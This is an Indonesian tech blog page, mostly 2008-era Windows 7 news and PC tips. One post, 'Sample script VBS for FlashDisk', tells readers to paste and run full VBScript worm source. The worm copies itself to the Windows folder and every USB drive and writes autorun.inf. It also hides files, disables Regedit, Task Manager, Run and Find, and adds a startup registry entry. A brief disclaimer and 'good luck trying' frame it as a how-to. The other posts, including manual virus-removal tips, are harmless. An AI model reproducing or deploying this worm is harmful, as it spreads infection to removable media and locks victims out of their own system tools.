Gambar yang berasal dari virus Vanpraja.B. Virus lokal yang satu ini akan mengeluarkan beberapa file gambar dari dalam resources tubuhnya, salah satunya dengan nama “Hacked by v@nP.jpg” seperti yang terlihat di atas. File di extract ke beberapa root drive yang terdapat di komputer korban. Secara fisik, ia mirip dengan file dokumen MsWord, dengan ukuran file sekitar 96KB, dan di-pack menggunakan UPX. Ada-ada saja memang aksinya, si pembuat virus ini mempromosikan sekolahnya dengan cara menyebarkan file teks yang berisi promosi tersebut ke setiap root drive termasuk.

Untuk lebih lengkapnya klik www.komputer-tech.co.cc

16
Nov

Sample scipt VBS for FlashDisk

Iseng-iseng googlink, eh tau – tau dapet sesuatu yang unik. Ga tau ada apa? kayanya akhir – akhir ini para virus maker banyak yang milih memakai bahasa VBS. Mungkin karena VB yang banyak bajakannya kali yach!!!!, dan yang terutama karena VBS lebih mudah dibuatnya dengan hanya menggunakan Notepad karena pada sistem windows sudah ada compilernya yaitu “Windows Based Script host


Nah Sekarang kita akan membuat contoh virus lagi dari VBS, Virus nih biasanya nyerang Flashdisk dan virus ini akan autorun sendiri, sehingga flash disk yang nyangkut di komputer akan terinfeksi, virus nih dikasih nama “system.dll.vbs”. Sekarang buka Notepad-nya. Copy kode berikut :


‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//
on error resume next

‘//–Dim kata-kata berikut ini–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,system,nt,check,sd

‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe system.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\batch- system.dll.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\batch- system.dll.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\batch- system.dll.vbs “)
tf.attributes = 39

‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket

for each flashdrive in fs.drives
‘//–Cek Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then

‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
set tf=fs.getfile(flashdrive.path &”\system.dll.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\system.dll.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\system.dll.vbs “)
tf.attributes = 39

‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next

‘//–Manipulasi Registry–//

set system = createobject(”WScript.Shell”)

‘//–Manip – Ubah Title Internet Explorer menjadi SYSTEM32–//
system.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” SYSTEM32 “

‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
system.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”

‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//
system.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
system.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
system.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
system.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
system.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”

‘//–Manip – Disable klik kanan–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”

‘//–Manip – Munculkan Pesan Setiap Windows Startup–//
system.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm system. Variant from WIN32, don’t panic all data are safe.”

‘//–Manip – Aktif setiap Windows Startup–//
system.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- system.dll.vbs “

‘//–Manip – Ubah RegisteredOwner dan Organization–//
system.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “win32”
system.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”system”

‘//–Nah kalau kode dibawah ini gw nggak tau, tolong kalo ada yang bisa untuk menjelaskan–//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘Akhir dari Kode

Masih nanya lagi tentang nama virusnya kenapa harus system.dll.vbs? apa ga bisa di ganti atau dirubah? tentu bisa, asalkan scrip diatas harus dirubah juga sama nama yang mau lo pakai nanti. Kalo “dll” itu fungsinya buat apa? gausah di pikirin itu mah ga da fungsinya, cuma buat iseng – iseng aja biar lo pada bingung. Wkakakakakaka …!!!!

Tapi gw tekankann lagi untuk tidak menyalah gunakan scrip ini. Scrip ini gw bahas cuma untuk perbandingan aja dari scrip – scrip yang sebelumnya aj, gw ga mau bertanggung jawab kalo ada apa – apa nantinya karena nih scrip bukan sepenuhnya dari ide gw … !!!!

# Selamat Mencoba

11
Oct

Goodbye Windows Vista, Lifelong XP

Masih ingatkah Anda ketika Microsoft mulai membatasi penjualan Windows XP dalam rangka menjelang terbitnya Windows 7 yang mungkin akan menggantikan Vista? Namun, sepertinya Microsoft harus mengubah semua prosedur yang telah dibuat sebelumnya mengenai batas hidup Windows XP.

Microsoft mulai menyadari kemauan sebagian besar konsumennya yang masih ingin menggunakan Windows XP dan telah merasa kurang puas dengan Vista. Untuk memenuhi keinginan konsumen, maka Microsoft memperpanjang batas waktu bagi para pengguna PC agar dapat mendowngrade atau berpindah dari Windows Vista ke Windows XP di mesin computer mereka.

Microsoft sendiri telah membuat aturan mengenai frame time downgrade ke Windows XP mulai 31 Januari 2009 hingga 31 Juli 2009. “Dengan adanya aturan tersebut, bukan berarti hak downgrade sistem menjadi hilang. Jika banyak konsumen yang berpindah dari Windows Vista ke Windows XP, maka kami akan memastikan bahwa proses transisinya dapat berjalan lancer dan sehalus mungkin. Namun untuk penyediaan media downgrade membutuhkan waktu beberapa bulan sebagai bukti dari komitmen kami.”, kata juru bicara Microsoft.

Microsoft memperkirakan sekitar enam bulan untuk menyediakan media downgrade untuk XP Professional untuk OEM dan system builder, bagi user yang terlanjur menggunakan Windows Vista Ultimate dan Business editions. Jadi bagi Anda yang ingin men-downgrade atau beralih dari Vista ke Windows XP, masih ada kesempatan hingga tahun 2009.

25
Sep

39 Bocoran Screenshot Windows 7

Blog ThinkNext.net telah menempatkan 39 screenshot yang menurutnya diambil dari Windows 7 versi M3 Build 6780, memperlihatkan berbagai aspek tampilan Windows 7 mulai dari Start Menu, Control Panel, Media Player dan tentunya halaman error Windows 7. Mary Jo Foley dari ZDNet yang sudah pernah melihat Windows 7 Build 6780 mengatakan bahwa “baik Microsoft maupun berbagai pengujinya tidak senang melihat beredarnya screenshot ini di web.”

Diduga Microsoft telah mulai merilis versi M3 secara internal maupun kepada beberapa orang penguji eksternal sejak tanggal 12 September, walaupun para karyawan Microsoft menolak untuk mengkonfirmasikan hal ini. Saat ditanya tentang fitur Windows 7, Microsoft selalu menyarankan orang-orang untuk mengunjungi blog Engineering Windows 7.

Minggu lalu beberapa orang petinggi Microsoft telah mengatakan bahwa mereka akan merilis informasi teknis mendetil di Professional Developers Conference atau WinHEC dalam beberapa minggu ke depan ini. Mereka juga mengatakan bahwa versi beta Windows 7 akan dikeluarkan di bulan Desember, dengan versi finalnya di pertengahan tahun 2009 tetapi sejak saat itu, masih belum ada lagi berita tentang Windows 7, hingga Microsoft merilis detil lebih lanjut dalam beberapa minggu mendatang ini, kita harus puas dengan 39 screenshot di bawah ini. (via Cnet, tips dari aerialsky)

Update: Lifehacker juga telah mempublikasikan beberapa video Windows 7 yang dapat Anda lihat di bawah ini.

Windows Media Player


Download video!
Download video!
Download video!

Sticky Notes


Download video!
Download video!
Download video!

Windows 7 Start Menu


Download video!
Download video!
Download video!

Windows 7 Calculator


Download video!
Download video!
Download video!
21
Sep

just for having funs

19
Sep

Windows 7 Beta Keluar Oktober, Versi Final Juni 2009


Microsoft tampaknya berusaha menutup babak Vista secepat mungkin dan gosip terhangat yang beredar saat ini adalah Microsoft akan merilis iterasi terakhir dari sistem operasi Windows setengah tahun lebih cepat dari jadwal. Menurut Computerworld, versi beta Windows 7 akan dirilis di salah satu atau bahkan dua konferensi Microsoft yaitu Professional Developers Conference (PDC) yang berlangsung pada tanggal 27-30 Oktober dan Windows Hardware Engineering Conference (WinHEC) pada tanggal 5-7 November.

Analis Microsoft Michael Cherry mengatakan bahwa ‘saat pengembang dalam jumlah sebesar itu berkumpul, Anda menginginkan mereka untuk pulang dengan sesuatu yang dapat mereka kutak-katik. Microsoft ingin melakukan lebih dari sekedar menjelaskan Windows 7 kepada para pengembang secara lisan.’

Apabila hanya boleh memilih satu dari dua konferensi yang ada, Cherry lebih cenderung pada WinHEC yang memiliki hadirin lebih sedikit. Menurut Cherry, semakin sedikit jumlahnya, semakin menarik untuk Microsoft yang kali ini serius dalam meningkatkan kinerja Windows ‘kemungkinan khawatir versi awal Windows akan diulas. Mereka tidak akan senang apabila seseorang memutuskan untuk menguji kinerja Windows yang masih berada dalam versi beta. Saat dirilis, pasti ada saja yang akan mempublikasikan kesan mereka dalam menggunakan Windows 7.’

Contohnya, lihat saja fakta bahwa versi beta dari IE8 dan Chrome yang dirilis belum lama ini. Kedua browser ini diulas secara mendalam, termasuk dalam segi kinerja. Begitu juga dengan versi beta Vista yang saat pertama kali dikeluarkan dikritik keras oleh beberapa situs.

Hingga minggu lalu, Microsoft belum mengatakan apapun tentang Windows 7 beta. Akan tetapi pada hari Rabu minggu lalu, Christina Storm, seorang program manager Microsoft mengatakan di blog Engineering Windows 7 bahwa mereka akan mulai mengumpulkan para penguji beta melalui prosedur biasa Microsoft melalui connect.microsoft.com/.

Walaupun secara resmi Microsoft menjadwalkan Windows 7 untuk dirilis pada bulan Januari 2010, InternetNews mengatakan bahwa kalender internal Microsoft sendiri menunjuk pada 3 Juni 2009 sebagai tanggal peluncuran Windows 7.

9
Sep

Software Gratis Khusus Mahasiswa

Tim evangelis Microsoft telah mengumumkan software terbarunya, hari ini, yang dinamakan DreamSpark, dimana semua mahasiwa dapat mendownload software ini untuk dimanfaatkan sebagai software pengembangan edisi professional dan desain, hanya dengan beberapa click dan menit, alias gratis. Namun, sebelum itu, terdapat proses verifikasi identitas mengenai data diri mahasiswa dan mengecek apakah user benar-benar seorang mahasiswa atau bukan, langsung dari institusi yang bersangkutan, walaupun belum semua institusi telah di-setup di dalam system. Peluncuran DreamSpark pertama kali dilakukan di Universitas Sanford, California, langsung oleh Chairman Microsoft Corp. Bill Gates, pada tanggal 19 Februari 2008. Kemudian DreamSpark juga telah mendulang sukses untuk lebih dari 35 juta mahasiswa di beberapa negara yang lain seperti Inggris, Kanada, Cina, Amerika, Jerman, Perancis, Spanyol, Swiss, dan Belgia. Sedangkan di Indonesia, pihak Microsoft Indonesia telah bekerja sama dengan beberapa universitas, termasuk UGM, UI, UAJY, PENS IT. (Politeknik Elektronika Negeri Surabaya Institut Teknologi 10 November) Surabaya, Gunadarma, Binus, ITB, Unibraw (Universitas Brawijaya), Unpad (Universitas Padjajaran), Universitas Ma Chung Malang, UPH (Universitas Pelita Harapan), dan Unpar (Universitas Parahyangan).


                                    www.dreamspark.com

Mengenai implementasi DreamSpark di Indonesia membutuhkan waktu kira-kira hampir satu tahun. Untuk mendownload software DreamSpark, dapat ke situs www.dreamspark.com. Berikut daftar software yang dapat didownload :

* Visual Studio 2008 Professional Edition
* Visual Studio 2005 Professional
* Visual Web Developer 2005
* Visual Basic 2005
* Visual C++ 2005
* Visual C# 2005
* Visual J# 2005
* Sql Server 2005 Express
* Sql Server Developer Edition
* Virtual PC 2007
* Windows Server 2003 Standard Edition
* Expression Studio
* XNA Game Studio 2.0
* XNA Creators Club Online

2
Sep

Tips n Trick

Menghadapi serangan berbagai macam virus komputer – dengan OS Microsoft Windows tentu saja – kebanyakan orang akan memikirkan bagaimana mendapatkan antivirus terbaru dan antivirus khusus untuk virus lokal tertentu karena kebanyakan software antivirus tidak mampu mendeteksinya. Berbeda dengan cara pikir yang sangat umum ini, saya menawarkan solusi alternatif menghadapi virus lokal yaitu membasminya secara manual.

Virus adalah program/aplikasi (=serangkaian perintah) yang mampu memperbanyak diri. Kebanyakan programer membuat virus-virus ini sebagai serangkaian perintah yang menyusup ke dalam barisan perintah-perintah dalam aplikasi-aplikasi lain. Virus-virus tertentu bahkan diprogram mampu menyelinap dalam master boot record ataupun sektor-sektor tertentu dalam disk dengan perlindungan khusus tanpa bisa dikenali pengguna sebagai file. Sayangnya pekerjaan cerdik ini tidak berlaku untuk kebanyakan virus lokal yang keberadaannya sangat mencolok dan mengundang permusuhan.

Berdasarkan titik lemah inilah kita dapat membasmi virus lokal secara manual. Ada dua acuan umum dalam membasmi virus secara manual yaitu menghentikan running virus dan melenyapkan virus-virus. Berdasarkan dua acuan ini anda dapat mengembangkan sendiri strategi anda tergantung kasus yang anda hadapi.

Bagian I: Menghentikan Running Virus

Untuk serangan virus yang dibuat dengan Visual Basic (VB) – untungnya kebanyakan virus lokal dibuat dengan VB – anda dapat menghentikan running virus dengan cara ‘menyingkirkan’ msvbvm50.dll dan msvbvm60.dll yang berada dalam direktori c:windowssystem32 yang merupakan virtual machine dari program-program yang dibuat dengan VB. Adapun istilah ‘menyingkirkan’ bisa diwujudkan dengan berbagai cara tergantung keadaan ataupun selera, yaitu dihapus (tidak dianjurkan), dipindah ke folder lain, atau diganti dengan nama lain. Selain itu caranya bisa dilakukan dengan berbagai cara tergantung dari tingkat serangan virus mulai dari menggunakan windows explorer, command prompt emulator pada windows (ketika virus menonaktifkan windows explorer), ataupun harus menjalankan windows dalam mode ‘save mode with command prompt only’ dengan menekan F8 pada awal windows startup untuk menampilkan startup menu. Jika virus masih tetap berjalan, berarti virus tidak dibuat dengan VB dan untuk menjalankan langkah selanjutnya anda harus menggunakan Linux atau OS lain yang tidak terpasang emulator untuk program-program windows.

Bagian II: Menghapus Virus-virus

Untuk melenyapkan virus-virus yang harus anda lakukan adalah mengumpulkan semua file aplikasi melalui find dengan entri nama *.exe, mengidentifikasi aplikasi-aplikasi yang merupakan virus, dan menghapus mereka. Jika menu find telah dinonaktifkan oleh virus, anda bisa memanggilnuya dengan menekan F3 (jauh lebih mudah daripada harus mengedit registry editor). Memvonis aplikasi sebagai virus sangat tergantung dari pengalaman dan insting anda, karena ciri-cirinya bisa sangat bervariasi; tetapi yang harus menjadi acuan adalah bahwa anda mencari hal-hal ‘tidak seperti yang semestinya dan berada di tempat semestinya’ atau terkesan disembunyikan. Aplikasi-aplikasi dengan icon Microsoft word Document atau icon folder bisa langsung divonis sebagai virus, tetapi aplikasi dengan ikon biasa pun harus anda curigai jika anda yakin siapapun tidak pernah memindahkannya ke sana. Untuk memperkecil ruang lingkup, anda juga perlu memperhatikan ukuran file karena banyak virus yang masing-masing mempunyai ukuran file sama.

Aplikasi yang telah anda vonis sebagai virus harus dihapus langsung dengan menekan sift+delete. Sebelumnya, pastikan semua data telah anda selamatkan dengan mengkopi isi dokumen dan di-paste di tempat lain dalam keadaan virus tidak runnig. Selamat beraksi.

2
Sep

Kelemahan Bios Intel

Salah satu demonstrasi yang menarik dalam Black Hat tahun ini adalah sebuah penemuan dari Johanna Rutkowska, yang telah menemukan kelemahan dari BIOS motherboard Intel yang dapat menjadi “pil pahit” dari hypervisor Xen ini. Detail mengenai kelemahan motherboard Intel memang belum dirinci untuk saat ini, namun Intel hanya memberikan detail garis besarnya.

Menurut saran Rutkowska dalam blognya, bahwa perbaikan yang nantinya akan dilakukan oleh Intel diharapkan dapat mencegah software yang mudah dimodifikasi yang berjalan di SMM (System Management Mode). SMM merupakan privilege operasi lingkungan yang berjalan di luar kontrol sistem operasi. Software ‘jahat’ akan berjalan dalam lingkungan ini, yang meliputi banyak operasi didalamnya. Level privilege Adminstratif nantinya yang akan bertanggung jawab atas perbaikan kelemahan BIOS motherboard Intel ini. Update BIOS untuk memperbaiki masalah ini akan menginfeksi semua motherboard brand Intel.

Motherboard Intel yang terinfeksi termasuk Intel DQ35JO, DQ35MP, DP35DP, DG33FB, DG33BU, DG33TL, DX38BT dan MGM965TW (Mobile). Pengumuman Intel ini juga menjadi peringatan bagi user bahwa level BIOS memiliki potensi untuk memberikan efek samping pada sistem computer dan untuk semua sistem operasi. Dengan adanya masalah ini, Intel kemudian menjadi frustrasi, karena bagaimanapun pihaknya belum pernah melihat tipe eksploitasi ini dalam motherboard-nya, dan Intel memutuskan untuk menambal lubang kelemahan tersebut untuk mencegah hal yang sama terjadi di masa mendatang.

30
Aug

Windows 7 akan hadir

Seorang bos enginner Windows, Steven Sinofsky, mengungkapkan bahwa pihak Microsoft telah me-launching blog Windows 7. Menurut rencana Sinofsky, blog Windows 7 tersebut nantinya dapat digunakan share beberapa detail dari Windows 7.

“PDC atau Professional Developers Conference yang akan diselenggarakan tanggan 27 Oktober nanti, dan WinHEC atau Windows Hardware Engineering Conference dalam mingu berikutnya, akan merepresentasikan sarana pertama kali, dimana kami dapat menyediakan informasi teknis mengenai Windows 7. Blog ini juga akan menyediakan konteks dengan posting regular selama 2 bulan ke depan, mengenai pengembangan Windows 7 di belakang layar.”, kata Sinofsky dan Jon Devaan, kepala sistem operasi Windows Core.

Menurut Sinofsky, Microsoft akan memasukkan Windows 7 pada PDC dalam beberapa manner. Sinofsky mengakui bahwa Microsoft tidak akan berbicara banyak, namun kembali kepada line standard Microsoft, bahwa perusahaan tersebut tidak akan melakukan share detail peluncuran selama mereka belum mencapai level penyelesaian yang nyata. Sinofsky menuturkan beberapa detail dari Windows 7 yang akan menggunakan driver yang sama dan basic kernel dari Windows Vista, yang menurut rencana akan dipasarkan pada Januari 2010, tiga tahun setelah peluncuran Windows Vista. Microsoft juga akan memasukkan interface multi-touch ke dalam Windows 7.

“Kami sangat percaya bahwa kesuksesan Windows 7 berasal dari keterbukaan, kejujuran dan diskusi mengenai bagaimana kami menyeimbangkan interest dan software dengan skala Windows. Kami menjanjikan akan membuat sebuah dialog dan segala detailnya dalam blog Windows 7 ini.”, kata Sinofsky.

Sinofsky menambahkan, bahwa Microsoft telah merangkul lebih banyak dan lebih dalam dengan pembuat beberapa pembuat computer lainnya, untuk ikut menjadi bagian dari proses desain Windows 7. Menurut rencana, blog Windows 7 ini mulai siap digunakan pada bulan Oktober mendatang.

www.BeritaNET.com